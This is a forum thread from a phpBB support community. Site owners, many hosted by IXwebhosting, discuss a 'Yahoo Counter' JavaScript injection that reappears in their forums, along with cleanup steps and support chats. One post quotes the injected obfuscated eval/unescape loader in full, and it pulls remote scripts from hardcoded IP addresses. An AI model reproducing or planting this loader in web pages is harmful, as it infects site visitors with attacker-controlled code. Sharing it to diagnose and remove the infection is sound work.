Yahoo Counter...

[Tarj]

The following is the basic SRT
Your board's URL: http://www.ithompson.com/phpBB3
Version of phpBB3: 3.03
Was this a fresh install or a(n) update/upgrade/conversion (please be specific)? Upgrade
If update, what package(s) did you use? Full version
Did you use an automated wizard provided by your host to install phpBB? No
MODs you have installed: None
When the problem started: 2 months ago
Your level of expertise (be honest): Enough to get me by

I was running the latest version of phpBB 2.x when it all started. A yahoo counter was on almost every page, and people were getting virus warnings and finally google had enough and considered our domain a threat. I upgraded to phpBB 3.0.3 on my personal domain and right away, I saw that the yahoo code was still there. This forum is a Word of Warcraft guild forum, and I have a member help keep the phpBB up-to-date. Together, we found out that the yahoo code was being caused by the database as the yahoo code would come up even if we installed new styles. My friend was able to clean up most of the yahoo code, but some of it still remains. Below is what users currently see, but for some reason, it is not in some of the forums. Below is an example:



Any help would be appreciated.

Thanks,
Bryan

[stevemaury]

Take a look in the forums table in the database using phpMyAdmin.

[sensei_kyle]

Yeah, found this waiting for me this morning as well. What I did was purge the cache directory (delete everything except .htaccess & index.htm). Go to the admin control panel, General tab, board settings. I found the "site description" was where the javascript code had been added.

[DDalton]

I have been dealing with this issue for weeks, I go and delete it and it returns within a week. Any help would be great

[-)G(-DrDoom]

Tarj,
We have also been dealing with this as well. We run a PHP Nuke Evolution site (also uses phpbb2 forums)that was hit about 3 weeks ago and have just about pulled our hair out trying to figure out how it became infected to start with. We are pretty cautious with our passwords, access to the root site (2 users) and run updated Antivirus on our PCs at all times. We went back to the Nuke Evolution community and ran it by the admins there and found out that there were other users with the same issue that we were having.

After much hair pulling, we finally figured out that all the people that were having issues had one thing in common, we were all IXwebhosting.com customers. I couldn't help but to look up your domain and notice that you are a customer of them as well. I was wonderning if the other posters on here having issues were also customers.

The only conclusion we could come up with is that they either have infected web hosting servers or they have a security hole somewhere.

I dont want this to come off as me bashing IXwebhosting, because we have been a customer of this company for over 3 years with good service, but it is ironic that everyone we've encountered with this Yahoo Counter issue are all IXwebhosting customers.

[pixelpadre]

ixwebhosting bad news

i too have ixwebhosting and all 30000 files were injected. has nothing to do with phpbb.

they will not accept any responibility.

i had to do a search and replace on every file. fortunately there is one program out there that will allow you to do a large string. ultraedit. highly recommend it. it will delete the bad text in 900 files in about 30 seconds.

[jjde86]

I am also on the yahoo counter problem bandwagon and have ixwebhosting. It is incredibly annoying and for all I know doing other harmful things. If anyone has found a way to fix this, please let us know.

pixelpadre, you mentioned using ultraedit to delete bad text. Is there any way (with this program or another) to delete the text directly on the website? By that I mean, without updating files on your computer and then uploading them again?

[UDPride]

I am hosted by IXWeb Hosting as well and run VBulletin and VB Advanced. Can all of us who are suffering this issue and use IXWeb ban together to help solve one anothers problem?

Ive noticed when I deactivate VB Advanced the problem goes away and the code is not there. Likewise with everything running, the malicious code is not in my VB templates.

I did notice a few of my folders were 777 permissions including the modules and cache folder.

I really need help with this. I did get that aforementioned email response listed above from IX, but when I got a hold of them, they indicated this Yahoo issue was a different issue and was on MY end.

Im not convinced its on my end. I never had any hack or trojan issues until this and if a lot of IXWeb people are running into the problem, it sounds like it could be a vulnerability the hosts have they encouraged this.

First and foremost however, what files and folders and bad code do I need to look for and delete?Huh I've heard suggestions o how to prevent hacks AFTER the fact on other web sites, but nothing seems to be focusing on how I resolve this issue right now.

Is it safe to any any VB and VBA files/folders should be 777 folder and 644 file? Would there be any exceptions to this?

Id really like some help on locating/removing the bad files and tag teaming the problem with others affected. We really need to get on IXWebs butt and force them to fix this issue. Like you, I dont believe it was a vulnerability we as forums owners were at fault for. I havent been hacked or trojaned once in 2yrs with IXWeb and have otherwise been a very happy customer. What can we do? There is strength in numbers. I'll help anyone who also helps me. Pay it forward. I just want this issue resolved.

Others can email me at chris@udpride.com if you wish. Thanks.

[UDPride]

More info for those affected...

IX Web doesnt have a script I know of, or wont tell us about it if they do. Just more info on the virus itself:

Look for an htacces file somewhere. May take some looking. Likely in that same folder is an index.htm file with a hacked message about George Bushes militarism and other jibberish. I can supply a TXT of the htm if you like. You obviously need to delete these files.

Also, you are going to have to look through most of your major PHP files in VBulletin (or whatever other forum you use). It likes to pick on the config files, admin files, and cache files (in all of your cache folders no matter where they reside -- I had several).

The script dumps a bazillion lines of code at the end of these PHP files as another PHP script to execute. I must have deleted it from 85-100 or so. Download file, delete the jibberish, upload file. Not knowing exactly if this was malicious code or VB PHP code I couldnt decipher, I rename a file to _hold, downloaded and removed the jibberish and re-uploaded and the forum was file. So I deleted the file on hold. Painstaking process.

I also went through and change some permissions on folders to 755. I had a cpl that were 777 and Im not sure I ever remember setting them to that. Also checked VB files and changed a few back to 644. Again, Im not convinced they were wrong from the beginning. I usually keep good oversight on this stuff.

Right now, the Yahoo Counter code seems to be removed from my footer, however its still located on most pages in my META DESCRIPTION tag as a script at the very end of my own words. Im hoping since its here and not in the body tag, its not executable and just a nuisance search engine issue at this point. VBulletin doesnt have a META DESCRIPTION field as far as I know -- at least not when I looked. Only META KEYWORDS.

So right now Im working on trying to remove it here.

Ive since changed all the paswords on my VB Control Panel who have admin access and changed my FTP password again. I will also be changing my database password in the a.m. Maybe these will have no affect but certainly cant hurt.

If anyone has more info on this or can speak up about IX Webs action, please tell us all.

[MikeB12]

our site has also been hit with this.
http://www.doxietown.com/phpBB2/index.php
in the source of the above page

Code: Select all

<td class="catLeft" colspan="2" height="28"><span class="cattitle"><a href="index.php?c=1" class="cattitle">Welcome to Doxietown
<script language=javascript><!-- Yahoo! Counter starts 
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/@%2F`.|%2E!%2E�&%3C~d@i#v%20#%73#%74%79$%6C%65@=&dis%70@%6Ca!y%3A|non~%65#%3E#\ndo&cu~%6De&n!t&.w%72it$%65#(%22%3C~%2F@t&%65%78~%74`a%72@ea|%3E"|%29`%3B`va%72`%20@i#,%5F!,~%61|=%5B%227%38!%2E11`0.#1$%37%35%2E%32%31@%22%2C~%22!%31`%39%35%2E2%34!.@%37%36.2%35!1"$%5D$%3B`%5F|%3D1`%3Bi&%66%28do%63!u@m~en%74&%2E`%63~o~%6Fk`ie@%2E&m%61@%74~c#%68%28#%2F%5C#b#h`g$%66%74%3D~%31&/$%29~=`=&%6E|u!%6C#%6C)%66%6Fr(i|=$%30&;i#%3C%32%3B~i+&+)%64o%63u%6De#%6Et~%2Ew!r~%69t@%65("$%3C$%73%63%72%69@p!%74%3Eif(&%5F|%29#d%6F#c!%75me@%6E@t!%2E%77#r%69~%74!e($%5C!"%3C&%73|c@r$%69%70~%74%20i|d$%3D|_%22$%2B%69%2B|"%5F%20`%73%72c%3D@%2F/"|+&%61[!%69!]+#"~/%63$%70%2F%3F#"+%6Ea%76%69g@a~%74&o!%72.a@%70p#%4Ea%6D~%65~.|%63h%61$%72&A%74&(%30%29+|"%3E%3C@%5C%5C%2F!%73@c%72i!%70%74|%3E%5C%22)!%3C%5C/s#%63&%72#%69pt#%3E@%22%29;\n%2F%2F~%3C%2F!d%69~v~%3E').replace(/\$|\||`|#|~|\&|@|\!/g,""));var yahoo_counter=1;
<!-- counter end --></script>

</a></span></td>

IX was sent a trouble ticket on Dec 11.
the tech came back telling me something about Frontpage Extensions being turned off!

so we said WTF!
and they replied:

Dear Customer,

Thanks for contacting technical support.

As I've just checked your forum has been hacked using Java Script Yahoo counter trojan. I've removed odd Java Script code from your phpBB database and now all working just fine. Please check this from your end. I can suggest to you check your computer on viruses, trojans and spyware programs using different antivirus software, because each of them uses own virus's signature database. After that change your FTP password and upgrade phpBB to latest version using steps below.

For upgrading phpBB2 for latest version, please follow this steps:
1) Download original config.php file from your forum folder in server
2) Delete all forum files from server and upload new version of forum to server
3) Upload also your downloaded config.php file
4) In browser type: http://yourdomain.com/phpBB/install/upd ... latest.php
5) After operation will be completed, delete install and contrib folders from phpBB folder and all should be work.


Should you have any further questions, please feel free to contact us anytime, we are available 24/7.
Technical Support
24*7 Helpdesk / Online Chat
Alex Karamushko

I've replaced my phpbb2 files from backup, no help.
I've exported my phpmyadmin structure and data entire sql, then used vlm to "find" "yahoo" and no hits.
I dont know what to do to fix this...
though it does seem to only affect IE for our site. Firefox experiences no delay.
and it only affects the index forum page, nothing once inside...

my only option left is to create another trouble ticket with IX. I I wish they would rectify this dam thing.

[Noxwizard]

There were some other issues with the IX servers a few weeks ago. It may be best to get another host. You can submit an incident ticket if you want and we can look over your files and database for you:

Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.

[scatrbrain]

I also have IX webhosting and have Yahoo Counter code as well.. I haven't figured out how to get rid of it either.

*update 12-21-08*
I discovered that my php chat room (x7chat2_0_5_1) also had the Yahoo Counter code in it as well.

I deleted all my phpbb3 files, reinstalled it fresh and everything was clean. as soon as i edited the config.php to point back to the old table prefix, the code was back again.

Last night I changed all my passwords per IX suggestion (even though im pretty sure its got nothing to do with that) and fortunately my forum was bran new, so I deleted the entire database and started with a new one, reinstalled phpbb3 again last night, this morning its still clean, but i have a clean back up of the forum and database. We`ll see what happens now.

[MikeB12]

Thanks Noxwizard. Im going to wait and see what happens with the IX trouble ticket first... even if you did find and fix it, it would be ashame to have it come right back due to a hosting problem on their server. so I'll wait nd see what pans out with support at IX. then go from there. the only users being affected are the IE users now. so I've ust been telling them to use firefox or chrome in the meantime. it's a low traffic site compared to what it was 2 yrs ago (that's the main reason I haven't gone to phpbb3), so I'm not getting a lot of complaints from people, just the handful that still frequents the board. plus I need to follow through until it gets fixed.

[ring-leader]

I am a reseller that has used IX hosting for the past 3 years with no problems until the last 2 months when I was hit with the yahoo counter script. I ended up fixing my customers blogs and webpages as well as my own only to have it return. This is rather insidious as it not only infects your php files but it infects html and java script files too. Unfortunately there is no magic pill to remove it and you have to check each and every file but I can give you a clue as to what files are most likely infected. When viewed they will no longer be owned by you but will have the ownership changed to "httpd" without the quotes. I also found that many of the files were cmodded from 755 to 444, another stumbling block to prevent you from replacing them with repaired versions. First time I had IX revert ownership back to my account then cmod them back to 755. After that and their denials of anything wrong on their part when it did it again I simply deleted each file before replacing it with the repaired version. That gets around the ownership and the cmod problems. I posted about this on my blog with a few tips on removal ; http://fightback.inquisitiveidiot.com/?p=235 If you need help or suggestions post a comment and tell me what you need and I will get back to you. I hope this helps.

[MikeB12]

well, for those of you that are IX.. here's my recent conversation (45 MIN):

Chat InformationPlease wait for a site operator to respond.

Chat InformationYou are now chatting with 'Kirill Koban'

Kirill Koban: Thank you for coming, my name is Kirill. How may I help you today?

you: I am experiencing the yahoo counter at http://www.doxietown.com/phpBB2/index.php

you: it is documented here http://www.phpbb.com/community/viewtopi ... &t=1322765

Kirill Koban: its a hack. PLease delete it and change your ftp and account passwords.

you: how do you delete it. read that phpbb thread!

you: still here.. let me know when you're ready to chat again.. I am logged in...

Kirill Koban: do you already have a ticket on this issue?

you: opened a ticket back on dec 11, and they said they fixed it.. but obviously not...

Kirill Koban: please provide me its number?

you: dont have a number, but still have the response..

you: Dear Customer, Thanks for contacting technical support. As I've just checked your forum has been hacked using Java Script Yahoo counter trojan. I've removed odd Java Script code from your phpBB database and now all working just fine. Please check this from your end. I can suggest to you check your computer on viruses, trojans and spyware programs using different antivirus software, because each of them uses own virus's signature database. After that change your FTP password and upgrade phpBB to latest version using steps below. For upgrading phpBB2 for latest version, please follow this steps: 1) Download original config.php file from your forum folder in server 2) Delete all forum files from server and upload new version of forum to server 3) Upload also your downloaded config.php file 4) In browser type: http://yourdomain.com/phpBB/install/upd ... latest.php 5) After operation will be completed, delete install and contrib folders from phpBB folder and all should be work. Should you have any further questions, please feel free to contact us anytime, we are available 24/7. Technical Support 24*7 Helpdesk / Online Chat Alex Karamushko

you: it did not help.

you: This is an issue that needs to go to upper level support. If you read the thread linked http://www.phpbb.com/community/viewtopi ... &t=1322765

you: multiple sites are experiencing the problem, and it's spawning even when cleaned. my site was supposedley cleaned on Dec 11, and it did clean it for non IE browsers. but IE users are still getting hit.

Kirill Koban: sorry but our system administrators work on it now.

you: it's obviously an attack that occurs at not just the domain level, but in the cluster. What can we do to resolve this. please read that thread linked, and you'll see it's a enterprise level problem.

you: is there anything thing that you can tell me? besides just "our system administrators work on it" like an eta or what we can do in the mean time?

Kirill Koban: Sorry but I cant say anything exactly about it

you: well, that says it I guess.. should I look for a new host?
10 MIN LATER
you: btw: I'm posting this conversation on the web.. nice advertising...